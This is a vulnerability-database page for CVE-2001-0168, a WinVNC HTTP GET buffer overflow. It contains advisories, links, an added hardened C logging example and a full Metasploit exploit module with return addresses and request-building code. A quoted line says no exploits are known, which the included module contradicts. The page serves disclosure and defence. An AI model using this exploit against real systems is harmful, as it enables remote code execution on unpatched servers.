CVE-2001-0168
CVSS 10.0
Published: 2001-05-03 00:00:00
Revised: 2016-10-17 22:10:06

[Original] Buffer overflow in AT&T WinVNC (Virtual Network Computing) server 3.3.3r7 and earlier allows remote attackers to execute arbitrary commands via a long HTTP GET request when the DebugLevel registry key is greater than 0.


[CNNVD] AT&T WinVNC Server Buffer Overflow Vulnerability (CNNVD-200105-064)

        CVE(CAN) ID: CAN-2001-0168

        WinVNC is a freely available remote administration package designed for accessing remote systems; it is distributed and maintained by AT&T.

        The server component of the package has a flaw that lets remote users execute arbitrary code. The problem lies in the handling of HTTP requests when a non-zero debug level is set. HTTP requests are placed into a 1024-byte buffer. When the DebugLevel value in the Windows registry is set to a value greater than zero, the HTTP request is written to the log with the ReallyPrint() function, which contains a fixed-size buffer of 1024 bytes. A specially crafted HTTP request sent to the WinVNC server can overwrite stack variables, including the return address.

        A malicious user can exploit this vulnerability to execute arbitrary code with the privileges of the WinVNC service process and thereby gain access to the remote system.

        <* Source: Emiliano Kargieman, Agustin Azubel, Maximiliano Caceres *>

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0168
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0168
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-064
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=vnc-list&m=98080763005455&w=2
(UNKNOWN)  BUGTRAQ  20010129 [CORE SDI ADVISORY] WinVNC server buffer overflow
http://www.kb.cert.org/vuls/id/598581
(UNKNOWN)  CERT-VN  VU#598581
http://www.securityfocus.com/bid/2306
(VENDOR_ADVISORY)  BID  2306
http://xforce.iss.net/static/6026.php
(VENDOR_ADVISORY)  XF  winvnc-server-bo(6026)

- Vulnerability information

AT&T WinVNC Server Buffer Overflow Vulnerability
Critical  Boundary Condition Error
2001-05-03 00:00:00 2006-04-07 00:00:00
Remote

- Advisories and patches

        Vendor patch:

        CNNVD recommends downloading and applying the patch immediately:

        ftp://ftp.core-sdi.com/pub/patches/VNC-serverBO.patch

- Vulnerability information (16491)

WinVNC Web Server <= v3.3.3r7 GET Overflow (EDBID:16491)
windows remote
2009-12-06 Verified
0 metasploit
N/A [Download]
##
# $Id: winvnc_http_get.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'WinVNC Web Server <= v3.3.3r7 GET Overflow',
			'Description'	=> %q{
				This module exploits a buffer overflow in the AT&T WinVNC version
				<= v3.3.3r7 web server. When debugging mode with logging is
				enabled (non-default), an overly long GET request can overwrite
				the stack. This exploit does not work well with VNC payloads!
			},
			'Author' 	=> 'patrick',
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision: 7724 $',
			'References'    =>
			[
				[ 'BID', '2306' ],
				[ 'OSVDB', '6280' ],
				[ 'CVE', '2001-0168' ],
			],
			'Privileged'		=> true,
			'DefaultOptions'	=>
			{
				'EXITFUNC'	=> 'thread',
			},
			'Payload'		=>
				{
					'Space'			=> 979,
					'BadChars' 		=> "\x00\x09\x0a\x0b\x0c\x0d\x20\x0b",
					'StackAdjustment' 	=> -3500,
				},
			'Platform' => ['win'],
			'Targets'  =>
			[
				[ 'Windows NT4 SP3-6', 	{ 'Ret' => 0x779f4e39 } ], # push esp, ret msvcrt.dll
				[ 'Windows 2000 SP1-4', { 'Ret' => 0x77bba3af } ], # jmp esp comctl32.dll
				[ 'Windows XP SP0-1', 	{ 'Ret' => 0x71ab7bfb } ], # jmp esp ws2_32.dll
			],
			'DisclosureDate' => 'Jan 29 2001',
			'DefaultTarget' => 1))

			register_options(
			[
				Opt::RPORT(5800),
			],self.class)
	end

	def exploit

		sploit = '/' + payload.encoded + [target['Ret']].pack('V')
		sploit << make_nops(8) + Rex::Arch::X86.jmp(0xfffffc1c)

		res = send_request_raw({
			'uri'          => sploit,
			'method'       => 'GET',
		}, 5)

		handler

	end

end
		

- Vulnerability information (F83084)

WinVNC Web Server <= v3.3.3r7 GET Overflow (PacketStormID:F83084)
2009-11-26 00:00:00
patrick  metasploit.com
exploit,web,overflow
CVE-2001-0168
[Download]

This Metasploit module exploits a buffer overflow in the AT&T WinVNC version <= v3.3.3r7 web server. When debugging mode with logging is enabled (non-default), an overly long GET request can overwrite the stack. This exploit does not work well with VNC payloads!


- Vulnerability information

6280
AT&T WinVNC Server HTTP GET Overflow
Remote / Network Access, Context Dependent Input Manipulation
Loss of Confidentiality, Loss of Integrity, Loss of Availability Third-Party Solution
Exploit Public

- Vulnerability description

A remote overflow exists in the AT&T WinVNC server. The HTTP component fails to perform bounds checking, resulting in a stack overflow. With a specially crafted request, an attacker can execute code remotely, resulting in a loss of confidentiality, integrity and availability.

- Timeline

2001-01-29 Unknown
Unknown Unknown

- Solution

Products

AT&T

WinVNC

v3.3.3r7

- Related references

- Vulnerability author

- Vulnerability information

AT&T WinVNC Server Buffer Overflow Vulnerability
Boundary Condition Error 2306
Yes No
2001-01-29 12:00:00 2009-07-11 04:46:00
This vulnerability was discovered by Emiliano Kargieman, Agustin Azubel, and Maximiliano Caceres of Core SDI, and announced to Bugtraq via a Core SDI Advisory on January 29, 2001.

- Affected software versions

AT&T WinVNC Server 3.3.3 r7
- Microsoft Windows 2000 Professional
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0

- Vulnerability discussion

WinVNC is a freely available software package designed to give remote desktop access to servers using a client/server model. It is distributed and maintained by AT&T.

A problem with the WinVNC server could allow remote users to arbitrarily execute code. The problem is due to the handling of HTTP requests when a non-zero debug level has been set. HTTP requests are placed into a buffer of 1024 bytes, and when the Windows registry key DebugLevel is set to a value greater than 0, the HTTP request is logged using the method ReallyPrint(), which contains a fixed buffer of 1024 bytes. It is possible to generate a custom crafted HTTP request to the WinVNC server that will overwrite variables on the stack, including the return address.

A malicious user can use this vulnerability to execute arbitrary code with privileges of the WinVNC server process, and potentially gain access to the local system.
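The defect described above, a fixed 1024-byte stack buffer filled from an attacker-controlled request inside a logging routine, is a well-known C pattern, and the fix is to bound the write. The following is an added example, not WinVNC's or Core SDI's code: a hypothetical `log_http_request()` formats the request into a fixed 1024-byte stack buffer with `snprintf()`, so an overlong request is truncated and reported rather than spilling into adjacent stack variables and the saved return address. `set_debug_level()` stands in for the DebugLevel registry check, and the request contents are constructed by `make_request()` purely as sample input.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same fixed size as the buffer the advisory describes. */
#define LOG_BUF_SIZE 1024

/* Hypothetical stand-in for the DebugLevel registry value (assumption). */
static int debug_level = 0;

void set_debug_level(int level)
{
    debug_level = level;
}

/* Bounded logger. snprintf() never writes more than sizeof buf bytes,
 * so an overlong request is cut off instead of overwriting the stack.
 * Copies the emitted line into `out` (at most out_size - 1 chars plus
 * NUL), sets *truncated when the request did not fit, and returns the
 * number of characters kept, or -1 when logging is disabled (level 0). */
int log_http_request(const char *request, char *out, size_t out_size,
                     int *truncated)
{
    char buf[LOG_BUF_SIZE];
    int needed;
    size_t n;

    *truncated = 0;
    if (debug_level <= 0)
        return -1;

    /* snprintf returns the length the full message would have had,
     * which is how we detect that it did not fit. */
    needed = snprintf(buf, sizeof buf, "Request: %s", request);
    if (needed < 0)
        return -1;
    if ((size_t)needed >= sizeof buf)
        *truncated = 1;          /* kept LOG_BUF_SIZE - 1 chars plus NUL */

    n = strlen(buf);
    if (n >= out_size)
        n = out_size - 1;
    memcpy(out, buf, n);
    out[n] = '\0';
    return (int)n;
}

/* Constructed sample input: a request line of `len` 'A' characters,
 * the shape of the overlong GET the advisory describes. */
static char *make_request(size_t len)
{
    char *req = malloc(len + 1);
    if (req == NULL)
        return NULL;
    memset(req, 'A', len);
    req[len] = '\0';
    return req;
}

/* Characters the logger kept for a request of `len` bytes at `level`;
 * -1 when logging is disabled or allocation fails. */
int logged_length(size_t len, int level)
{
    char line[LOG_BUF_SIZE];
    int truncated, kept;
    char *req = make_request(len);
    if (req == NULL)
        return -1;
    set_debug_level(level);
    kept = log_http_request(req, line, sizeof line, &truncated);
    free(req);
    return kept;
}

/* 1 if the request had to be truncated, 0 if it fit, -1 if not logged. */
int was_truncated(size_t len, int level)
{
    char line[LOG_BUF_SIZE];
    int truncated, kept;
    char *req = make_request(len);
    if (req == NULL)
        return -1;
    set_debug_level(level);
    kept = log_http_request(req, line, sizeof line, &truncated);
    free(req);
    return kept < 0 ? -1 : truncated;
}

int main(void)
{
    printf("10-byte request, level 1: %d chars kept, truncated=%d\n",
           logged_length(10, 1), was_truncated(10, 1));
    printf("4000-byte request, level 1: %d chars kept, truncated=%d\n",
           logged_length(4000, 1), was_truncated(4000, 1));
    printf("4000-byte request, level 0: %d (not logged)\n",
           logged_length(4000, 0));
    return 0;
}
```

The truncation flag matters for detection as well as safety: a logger that silently drops the tail of a 4000-byte request hides the very event a defender would want to alert on, so the hardened version reports it to the caller rather than only discarding the excess.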

- Exploit

Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- Solution

The following patch was provided by Core SDI:


AT&T WinVNC Server 3.3.3 r7

- Related references

    About the SCAP Chinese Community

    The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

    Copyright notice

    CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are maintained on MITRE's websites.